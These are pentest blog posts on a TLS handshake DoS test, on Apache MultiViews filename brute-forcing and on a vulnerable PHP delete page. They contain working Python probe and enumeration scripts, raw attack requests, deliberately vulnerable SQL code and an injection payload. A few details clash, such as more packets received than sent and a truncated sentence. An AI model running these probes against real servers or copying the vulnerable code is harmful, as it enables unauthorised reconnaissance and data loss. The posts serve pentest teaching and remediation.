<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<![endif]-->
<br />
<span style="font-size: x-small;"><span style="background-color: yellow;">host:xxx.xxx.xxx</span><br />
<span style="background-color: yellow;">Handshakes 0 [0.00 h/s], 1 Conn, 0 Err</span><br />
Handshakes 44 [43.48 h/s], 16 Conn, 0 Err<br />
Handshakes 118 [71.32 h/s], 25 Conn, 0 Err<br />
Handshakes 193 [76.69 h/s], 32 Conn, 0 Err<br />
Handshakes 290 [99.53 h/s], 38 Conn, 0 Err<br />
Handshakes 371 [79.16 h/s], 43 Conn, 0 Err<br />
Handshakes 459 [89.97 h/s], 48 Conn, 0 Err<br />
Handshakes 545 [87.55 h/s], 52 Conn, 0 Err<br />
Handshakes 632 [84.57 h/s], 56 Conn, 0 Err<br />
Handshakes 728 [96.96 h/s], 60 Conn, 0 Err<br />
Handshakes 819 [91.05 h/s], 63 Conn, 0 Err<br />
Handshakes 913 [95.76 h/s], 66 Conn, 0 Err<br />
Handshakes 989 [76.02 h/s], 70 Conn, 0 Err<br />
Handshakes 1086 [96.98 h/s], 73 Conn, 0 Err<br />
Handshakes 1165 [78.37 h/s], 77 Conn, 0 Err<br />
Handshakes 1264 [97.87 h/s], 81 Conn, 0 Err<br />
<b>…[omitted]…</b><br />
Handshakes 3642 [89.20 h/s], 144 Conn, 0 Err<br />
Handshakes 3738 [92.35 h/s], 146 Conn, 0 Err<br />
Handshakes 3828 [92.36 h/s], 148 Conn, 0 Err<br />
Handshakes 3919 [93.75 h/s], 149 Conn, 0 Err<br />
Handshakes 4003 [83.73 h/s], 151 Conn, 0 Err<br />
Handshakes 4099 [90.18 h/s], 153 Conn, 0 Err<br />
Handshakes 4197 [105.10 h/s], 155 Conn, 0 Err<br />
Handshakes 4288 [90.83 h/s], 157 Conn, 0 Err<br />
Handshakes 4379 [88.02 h/s], 159 Conn, 0 Err<br />
Handshakes 4468 [88.77 h/s], 160 Conn, 0 Err<br />
Handshakes 4568 [95.30 h/s], 162 Conn, 0 Err<br />
Handshakes 4649 [87.94 h/s], 164 Conn, 0 Err<br />
Handshakes 4743 [89.97 h/s], 166 Conn, 0 Err<br />
Handshakes 4844 [106.67 h/s], 167 Conn, 0 Err<br />
<span style="background-color: yellow;">Handshakes 4930 [81.71 h/s], 169 Conn, 0 Err</span></span>
<br />
<br />
<u>Hping3 output</u><br />
<br />
<span style="font-size: x-small;"> hping3 -T -p 443 xxx.xxx.xxx</span><br />
<span style="font-size: x-small;"><br />HPING xxx.xxx.xxx (eth1 xxx.xxx.xxx): NO FLAGS are set, 40 headers + 0 data bytes<br />hop=1 TTL 0 during transit from ip=xxx.xxx.xx. name=xxx<br />hop=1 hoprtt=0.6 ms<br /><b>...[omitted]...</b><br />--- xxx.xxx.xxx hping statistic ---<br /><span style="background-color: yellow;">10 packets transmitted, 15 packets received, 0% packet loss</span></span><br />
<b>Conclusion</b><br />
<br />
Running point-and-click hacking tools to test for Symmetric DoS vulnerabilities should not be taboo. Once the test has actually been run there is zero doubt that the specific vulnerability is exploitable, and the run produces evidence that is useful beyond the finding itself: the sysadmin can, for example, use the same stress-test tools to record the performance of the server while the attack is in progress. The obvious caveat is that such a test is only run inside an agreed scope and time window, with the owner of the system watching, because the impact is exactly the one being demonstrated.<br />
<br />
<b>References:</b><br />
<br />
<ul>
<li><a href="https://www.thc.org/">https://www.thc.org/</a></li>
<li><a href="https://tools.ietf.org/html/rfc5746">https://tools.ietf.org/html/rfc5746</a></li>
<li><a href="http://stackoverflow.com/questions/16909409/how-can-i-solve-the-qualys-apache-partial-http-request-denial-of-service-vulnera">http://stackoverflow.com/questions/16909409/how-can-i-solve-the-qualys-apache-partial-http-request-denial-of-service-vulnera</a></li>
</ul>
<br /><div class="blogger-post-footer">Penetest Horror Blog</div>
<h2 style="text-align: left;">Apache mod_negotiation or MultiViews filename bruteforcing</h2>
<div>Published 2015-02-16, last updated 2015-02-17.</div>
<b>Filename Brute-forcing through MultiViews Vulnerability</b><br />
<br />
<br />
<div style="text-align: justify;">
This is a short post about an easy way to find backup and other unlinked files on Apache web servers that have the MultiViews option enabled. There is not much information available about MultiViews (an Apache feature), and some web application scanners report the issue as "Apache mod_negotiation filename brute-forcing" rather than as MultiViews being enabled. Apache HTTPD supports content negotiation as described in the HTTP/1.1 specification (see <a href="http://www.w3.org/Protocols/rfc2616/rfc2616.html">http://www.w3.org/Protocols/rfc2616/rfc2616.html</a>). It can choose the best representation of a resource based on the browser-supplied preferences for media type, language, character set and encoding. It also implements a couple of features to give more intelligent handling of requests from browsers that send incomplete negotiation information.<br />
<br />
<b>What are resources</b></div>
<br />
A resource is a conceptual entity identified by a URI (RFC 2396). An HTTP server like Apache HTTP Server provides access to representations of the resource(s) within its namespace, with each representation in the form of a sequence of bytes with a defined media type, character set, encoding, etc. Each resource may be associated with zero, one, or more than one representation at any given time. If multiple representations are available, the resource is referred to as negotiable and each of its representations is termed a variant. The ways in which the variants for a negotiable resource vary are called the dimensions of negotiation.<br />
<br />
<b>Negotiation in httpd</b><br />
<div>
<div>
<div>
<br /></div>
<div>
In order to negotiate a resource, the server needs to be given information about each of the variants. This is done in one of two ways:</div>
<div>
<ul>
<li>Using a type map (i.e., a *.var file) which names the files containing the variants explicitly, or</li>
<li>Using a 'MultiViews' search, where the server does an implicit filename pattern match and chooses from among the results.</li>
</ul>
<b>Using MultiViews to brute-force files</b><br />
<br />
<div style="text-align: justify;">
MultiViews is a per-directory option, meaning it can be set with an Options directive within a &lt;Directory&gt;, &lt;Location&gt; or &lt;Files&gt; section in httpd.conf, or (if AllowOverride is properly set) in .htaccess files.<br />
<br /></div>
<div style="text-align: justify;">
The effect of MultiViews is as follows: if the server receives a request for /some/dir/foo, if /some/dir has MultiViews enabled, and /some/dir/foo does not exist, then the server reads the directory looking for files named foo.*, and effectively fakes up a type map which names all those files, assigning them the same media types and content-encodings it would have if the client had asked for one of them by name. It then chooses the best match to the client's requirements.</div>
<br />
</div>
</div>
<div>
<br />
<b>Impact</b><br />
<br />
An attacker can use this behaviour to discover files in a directory that are not linked from anywhere, and potentially to gather further sensitive information through the mod_negotiation module. mod_negotiation is the Apache module that selects, from several available documents, the one that best matches the client's capabilities. If the client sends an Accept header that none of the variants satisfies, the server responds with a 406 Not Acceptable error whose body contains a pseudo directory listing of the available variants (or, when the request asks for transparent negotiation, a 300 Multiple Choices with the same list in the Alternates header). This helps an attacker learn more about the target: build a list of base names, build a list of interesting extensions, and look for backup files and similar leftovers. One caveat when interpreting results: by default (MultiViewsMatch NegotiatedOnly) Apache only lists candidates whose extra extensions it recognises as a content type, language, charset or encoding, so a file such as foo.bak is only listed where the administrator has relaxed MultiViewsMatch (for example to Any); an empty listing therefore does not prove that no backup exists.<br />
<br />
<b>Proof Of Concept </b><br />
<br />
<b>Example 1:</b><br />
<br />
<b>Request:</b><br />
<br />
GET <span style="background-color: yellow;">/mymanual/de/glossary.html</span> HTTP/1.1<br />
Host: xxx.xxx.xxx.xxx<br />
Accept: application/xxx; q=1.0<br />
Negotiate: *<br />
User-Agent: xxx<br />
Connection: close<br />
Referer: http://xxx.xxx.xxx.xxx/test/se/<br />
Cookie: LangID=2; PHPSESSID=xxxx<br />
<br />
<b>Response:</b><br />
<br />
HTTP/1.1 300 <span style="background-color: yellow;">Multiple Choices</span><br />
Date: Tue, 16 Sep 2014 12:56:46 GMT<br />
Server: Apache/2.2.22 (Linux/SUSE)<br />
<span style="background-color: yellow;">Alternates: {"glossary.html.de" 1 {type text/html} {charset iso-8859-1} {language de} {length 32714}}, {"glossary.html.en" 1 {type text/html} {charset iso-8859-1} {language en} {length 27855}}, {"glossary.html.es" 1 {type text/html} {charset iso-8859-1} {language es} {length 23586}}, {"glossary.html.fr" 1 {type text/html} {charset iso-8859-1} {language fr} {length 30561}}, {"glossary.html.ja.utf8" 1 {type text/html} {charset utf-8} {language ja} {length 30880}}, {"glossary.html.ko.euc-kr" 1 {type text/html} {charset euc-kr} {language ko} {length 19474}}, {"glossary.html.tr.utf8" 1 {type text/html} {charset utf-8} {language tr} {length 30911}}</span><br />
Vary: negotiate,accept-language,accept-charset<br />
TCN: list<br />
Content-Length: 1039<br />
Connection: close<br />
Content-Type: text/html; charset=iso-8859-1<br />
<b>…[omitted]…</b><br />
</div>
<div>
<b>Note:</b> In the first example we request a specific file, glossary.html, which does not exist under that exact name. With MultiViews enabled, Apache searches the directory for glossary.html.* and, because the Accept header matches none of the candidates and the Negotiate header asks for transparent negotiation, answers 300 Multiple Choices with every candidate listed in the Alternates header (TCN: list). The language-specific names in that header (glossary.html.de, glossary.html.en, ...) are the files that actually exist on disk, which is the information the attacker is after.<br />
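<br />
<div style="text-align: justify;">The script below is an added example and is not code from the original post. It automates what the examples do by hand: it builds the probe request (the Negotiate value is the one used in the request above), parses the Alternates header of a 300 response into variant names (the embedded sample is three entries from the header captured above), falls back to the links in Apache's 406 Not Acceptable page (the exact markup of that page is an assumption, so the regex is deliberately loose), and flags names whose extra extension looks like a backup or source copy (the BACKUP_EXTS list is an assumption of this example, not something Apache defines). The probe() function talks to a live host that you must supply; everything else runs offline.</div>

```python
"""Enumerate file variants that Apache MultiViews exposes for a URL.
Added example, not code from the post: parses the Alternates header of a
300 response (sample below is the one captured in the post), falls back to
the links in Apache's 406 page, and flags backup-looking names."""
import re
import socket
import ssl
from typing import Dict, List, Tuple

# One Alternates entry: {"name" quality {attr value} {attr value} ...}
_VARIANT_RE = re.compile(
    r'\{"(?P<name>[^"]+)"\s+(?P<qs>[\d.]+)(?P<attrs>(?:\s*\{[^{}]*\})*)\s*\}')
_ATTR_RE = re.compile(r"\{(\w+)\s+([^{}]*)\}")
_HREF_RE = re.compile(r'<a\s+href="([^"]+)"', re.I)  # 406 page links (assumed format)
# Extra extensions worth chasing (assumption of this example; extend to taste)
BACKUP_EXTS = {"bak", "old", "orig", "save", "swp", "tmp", "inc", "sql",
               "tar", "gz", "zip", "txt", "phps"}


def parse_alternates(header: str) -> List[Dict[str, str]]:
    """Alternates header value -> list of {name, qs, type, charset, ...}."""
    variants = []
    for m in _VARIANT_RE.finditer(header):
        v = {"name": m.group("name"), "qs": m.group("qs")}
        v.update((k, val.strip()) for k, val in _ATTR_RE.findall(m.group("attrs")))
        variants.append(v)
    return variants


def parse_406_body(body: str) -> List[str]:
    """File names from the pseudo directory listing of a 406 page."""
    return [h.rsplit("/", 1)[-1] for h in _HREF_RE.findall(body)]


def interesting(names: List[str]) -> List[str]:
    """Variants whose extra extensions look like backups or source copies."""
    return [n for n in names
            if {p.lower() for p in n.split(".")[1:]} & BACKUP_EXTS]


def build_probe(host: str, path: str) -> bytes:
    """Request that makes mod_negotiation list the variants of `path`:
    the Accept type matches nothing, so no variant wins, and the Negotiate
    header (value taken from the post's request) asks for a 300 + Alternates."""
    return (f"GET {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Accept: application/x-does-not-exist; q=1.0\r\n"
            "Negotiate: *\r\nConnection: close\r\n\r\n").encode()


def split_response(raw: bytes) -> Tuple[int, Dict[str, str], str]:
    """Status code, lower-cased headers (folded lines joined) and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers: Dict[str, str] = {}
    last = ""
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and last:       # RFC 2616 header folding
            headers[last] += " " + line.strip()
            continue
        name, _, val = line.partition(":")
        last = name.strip().lower()
        headers[last] = val.strip()
    return int(lines[0].split()[1]), headers, body.decode("iso-8859-1", "replace")


def variants_from_response(raw: bytes) -> List[str]:
    """Names listed by a 300 (Alternates header) or a 406 (body links)."""
    status, headers, body = split_response(raw)
    if status == 300 and "alternates" in headers:
        return [v["name"] for v in parse_alternates(headers["alternates"])]
    return parse_406_body(body) if status == 406 else []


def probe(host: str, path: str, port: int = 443, tls: bool = True) -> List[str]:
    """Send the probe to a live host (you supply it) and return the names."""
    sock = socket.create_connection((host, port), timeout=10)
    if tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(build_probe(host, path))
        chunks = []
        while data := sock.recv(65536):
            chunks.append(data)
    return variants_from_response(b"".join(chunks))


# Alternates header captured in the post's first example (three of the entries)
SAMPLE_ALTERNATES = (
    '{"glossary.html.de" 1 {type text/html} {charset iso-8859-1} {language de} '
    '{length 32714}}, {"glossary.html.en" 1 {type text/html} {charset iso-8859-1} '
    '{language en} {length 27855}}, {"glossary.html.ja.utf8" 1 {type text/html} '
    '{charset utf-8} {language ja} {length 30880}}')
```

<div style="text-align: justify;">Drive probe() from a wordlist of base names (request /dir/index, /dir/config, /dir/db rather than full filenames, because MultiViews only expands foo.*) and pass the returned names through interesting(). Remember that unrecognised extensions such as .bak are only listed when the server's MultiViewsMatch setting allows them, so treat an empty result for a base name as "not listed", not as "not there".</div>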
<br />
<b>Example 2:</b><br />
<br />
<b>Request:</b><br />
<br />
GET /ba* HTTP/1.1<br />
Host: xxx<br />
Accept: application/whatever; q=1.0<br />
Accept-Charset: iso-8859-9<br />
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)<br />
Connection: close<br />
Referer: http://xxx.xxx.xxx.xxx/manual/de/<br />
Cookie: LangID=2; PHPSESSID=xxxx<br />
<br />
<b>Response:</b><br />
<br />
<pre>HTTP/1.1 404 Not Found
Date: Tue, 16 Sep 2014 13:33:18 GMT
Server: Apache/2.2.22 (Linux/SUSE)
<span style="background: yellow;">Alternates: {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-2} {language cs} {length 745}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language de} {length 766}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language en} {length 611}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {language es} {length 699}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language fr} {length 789}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language ga} {length 813}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language it} {length 692}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-2022-jp} {language ja} {length 749}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset euc-kr} {language ko} {length 703}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language nl} {length 688}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-2} {language pl} {length 707}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language pt-br} {length 753}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language pt} {length 272}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language ro} {length 689}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-5} {language sr} {length 716}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language sv} {length 722}},
 {"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-9} {language tr} {length 755}}</span>
Vary: accept-language,accept-charset
Content-Length: 409
Connection: close
Content-Type: text/html; charset=iso-8859-1
…[omitted]…</pre>
<b style="font-family: Calibri, sans-serif; font-size: 11pt;">Note: </b><span style="font-family: Calibri, sans-serif; font-size: 11pt;">In this example we request a file name using a wildcard character (*). Because MultiViews is enabled, the server does not answer with a bare 404: the Alternates header enumerates every variant mod_negotiation considered, with its file name, content type, charset, language and size, and the Vary header confirms that the choice is driven by the client's Accept-Language and Accept-Charset. An unauthenticated client can therefore learn file names on the server that it was never meant to see. More specifically .</span><br />
<br />
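As an added example (it is not part of the original post), here is a small Python helper that does what a tester does by hand with the exchange above: it builds the wildcard probe request and parses the Alternates header of the reply into the file names, types, charsets, languages and sizes it discloses. The sample header value is copied from the response above and abridged to three variants; the probe's Accept and Accept-Language values and the host name are illustrative assumptions.

```python
import re

# Constructed sample: the Alternates value from the 404 response above,
# abridged to three variants (one of them has no charset attribute).
SAMPLE_ALTERNATES = (
    '{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-2} {language cs} {length 745}}, '
    '{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {charset iso-8859-1} {language de} {length 766}}, '
    '{"HTTP_NOT_FOUND.html.var" 1 {type text/html} {language es} {length 699}}'
)

# One variant looks like: {"file name" quality {attr value} {attr value} ...}
_VARIANT_RE = re.compile(r'\{"([^"]+)"\s+([0-9.]+)((?:\s*\{[^{}]*\})*)\s*\}')
_ATTR_RE = re.compile(r'\{(\w+)\s+([^{}]*)\}')


def parse_alternates(value):
    """Parse an Apache mod_negotiation Alternates header value into a list of dicts,
    one per variant: name, quality, plus whichever attributes the variant carries."""
    variants = []
    for m in _VARIANT_RE.finditer(value):
        name, quality, attrs = m.group(1), float(m.group(2)), m.group(3)
        entry = {"name": name, "quality": quality}
        for a in _ATTR_RE.finditer(attrs):
            key, val = a.group(1), a.group(2).strip()
            entry[key] = int(val) if key == "length" else val
        variants.append(entry)
    return variants


def disclosed_filenames(headers):
    """Return the distinct file names an Alternates header leaks, given the response
    headers as a dict (header name lookup is case-insensitive). Empty list if none."""
    for name, value in headers.items():
        if name.lower() == "alternates":
            return sorted({v["name"] for v in parse_alternates(value)})
    return []


def probe_request(host, prefix, path="/"):
    """Build the raw HTTP/1.1 probe: a wildcard in the file name, plus Accept values
    that no real variant satisfies (illustrative, as in the request above), so that
    Apache has to fall back to an error page and, with MultiViews on, list what it
    considered in the Alternates header."""
    return (
        "GET {path}{prefix}* HTTP/1.1\r\n"
        "Host: {host}\r\n"
        "Accept: application/x-no-such-type; q=1.0\r\n"
        "Accept-Language: xx\r\n"
        "Connection: close\r\n\r\n"
    ).format(path=path, prefix=prefix, host=host)


if __name__ == "__main__":
    for v in parse_alternates(SAMPLE_ALTERNATES):
        print(v)
    print(disclosed_filenames({"Alternates": SAMPLE_ALTERNATES}))
```

Send the output of probe_request() to the target, feed the reply's headers to disclosed_filenames(); a non-empty result means mod_negotiation is enumerating variants on behalf of an unauthenticated client, and repeating the probe with different prefixes maps the directory.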
<b style="font-size: 11pt;">Remediation</b><span style="font-size: 11pt;"> </span><br />
<span lang="EN-US" style="text-align: justify;"><br /></span>
<span lang="EN-US" style="text-align: justify;">Disable the MultiViews option in Apache's configuration (in the relevant Directory or virtual host block, or globally) and restart Apache; if content negotiation is not used at all, mod_negotiation can be left unloaded. If you do not control the main configuration, you can disable MultiViews per directory with a .htaccess file containing the following line, which only takes effect where the server's AllowOverride setting permits the Options directive:</span><br />
<br />
<pre>Options -MultiViews</pre>
<br />
<b>References: </b><br />
<ol>
<li><a href="http://www.wisec.it/sectou.php?id=4698ebdc59d15">http://www.wisec.it/sectou.php?id=4698ebdc59d15</a></li>
<li><a href="http://www.acunetix.com/vulnerabilities/apache-mod_negotiation-fi/">http://www.acunetix.com/vulnerabilities/apache-mod_negotiation-fi/</a></li>
<li><a href="http://www.securityfocus.com/bid/3009">http://www.securityfocus.com/bid/3009</a></li>
</ol>
</div>
</div>
<div class="blogger-post-footer">Penetest Horror Blog</div>
<h2 style="text-align: left;">PHP Source Code Chunks of Insanity (Delete Post Pages) Part 4</h2>
<div>Published 2014-04-17, last updated 2017-01-12.</div>
<b>Intro </b><br />
<br />
This post is about reviewing PHP source code and demonstrates how a relatively small chunk of code can cause a lot of problems.<br />
<b><br /></b><b>The Code</b><br />
<br />
In this article we are going to analyze the code displayed below. It might seem innocent to some, but it is not. We are going to assume that it is used by a web site to let logged-in users delete their own posts securely.
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <?php
require_once 'common.php';
validatemySession();
mydatabaseConnect();
$username = $_SESSION['username']; // Insecure source: the value was user-supplied when the account was created
$username = stripslashes($username); // Improper filtering: strips backslashes before escaping
$username = mysql_real_escape_string($username); // Flawed function: blacklist escaping, leaves % and _ untouched
// Delete the post that matches the postId, ensuring that it was created by this user
$queryDelete = "DELETE FROM posts WHERE PostId = " . (int) $_GET['postId'] . " AND Username = '$username'";
if (mysql_query($queryDelete)) { // Bad validation coding: TRUE on any successful DELETE, even when 0 rows matched
    header('Location: myPosts.php');
}
else {
    echo "An error has occurred.";
}
?>
</code></pre>
<br />
If you look carefully at the code you will see that it is vulnerable to the following issue: SQL injection.<br />
<span style="font-family: "cambria"; font-size: 12pt;"> </span><br />
If you think this is not accurate, think again.<br />
<div>
<br /></div>
<div>
<b>The SQL Injection</b></div>
<div>
<b><br /></b></div>
<div>
<span style="font-family: cambria; font-size: 12pt;">An adversary exploiting this vulnerability would not have to script custom tools; a good knowledge of SQL injection methodology and some exposure to PHP coding is enough.</span><br />
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12pt;">Vulnerable Code:</span></div>
<div>
<div class="column">
<span style="font-family: "cambria"; font-size: 12pt;"><br /></span>
<span style="font-family: "cambria"; font-size: 12.000000pt;"><u>1st Code Chunk</u> </span></div>
</div>
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> $username = $_SESSION['username']; // Insecure source
$username = stripslashes($username); // Improper filtering
$username = mysql_real_escape_string($username); // Flawed function </code></pre>
<span style="font-family: "cambria"; font-size: 12.000000pt;"><u>2nd Code Chunk: </u></span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> $queryDelete = "DELETE FROM posts WHERE PostId = " . (int) $_GET['postId']. " AND Username = '$username'"; </code></pre>
<span style="font-family: "cambria"; font-size: 12.000000pt;"><u>3rd Code Chunk: </u> </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> if (mysql_query($queryDelete))
</code></pre>
<br />
<span style="font-family: cambria; font-size: 12pt;">The </span><span style="color: rgb(84, 141, 212); font-family: cambria; font-size: 12pt; font-style: italic;">mysql_real_escape_string </span><span style="font-family: cambria; font-size: 12pt;">function is based on a blacklist mentality. It escapes special characters in the unescaped string, taking into account the current character set of the connection, so that the result can be placed inside a quoted string literal of a </span><span style="color: rgb(84, 141, 212); font-family: cambria; font-size: 12pt; font-style: italic;">mysql_query. </span><span style="font-family: cambria; font-size: 12pt;">More specifically, </span><span style="color: rgb(84, 141, 212); font-family: cambria; font-size: 12pt; font-style: italic;">mysql_real_escape_string </span><span style="font-family: cambria; font-size: 12pt;">calls MySQL's C library function of the same name, which prepends a backslash to the following characters only:</span><br />
<ol style="font-family: cambria; font-size: 12pt;">
<li>\x00 (NUL)</li>
<li>\n</li>
<li>\r</li>
<li>\</li>
<li>'</li>
<li>"</li>
<li>\x1a (Control-Z)</li>
</ol>
<span style="font-family: cambria; font-size: 12pt;">Nothing else is touched: the LIKE wildcards % and _, SQL keywords and function names all pass through unchanged, so a value such as SELECT BENCHMARK(50,MD5(CHAR(118))) survives escaping intact. Escaping protects the query only by keeping the value inside the quoted literal; as long as the value stays between the quotes, as in the Username = '$username' clause above, such text is just data. The blacklist fails where the value is compared with LIKE, because the wildcards are live there, or wherever the quotes around it are dropped. A realistic scenario, assuming the ownership check is done with LIKE, would be to use a pattern such as the one below:</span><br />
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;"><br /></span>
<span style="font-family: cambria; font-size: 12pt; font-weight: 700;">Step1: </span><span style="font-family: cambria; font-size: 12pt;">SQL payload that makes the ownership check match another user's row: the pattern matches any username ending in s, so a post is deleted without the attacker being its owner.</span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> LIKE '%s' </code></pre>
<br />
<span style="font-family: cambria; font-size: 12pt; font-weight: 700;">Note1: </span><span style="font-family: cambria; font-size: 12pt;">At this point we assume that the attacker knows the format of the usernames, e.g. "user" followed by a two-digit number.</span><br />
<br />
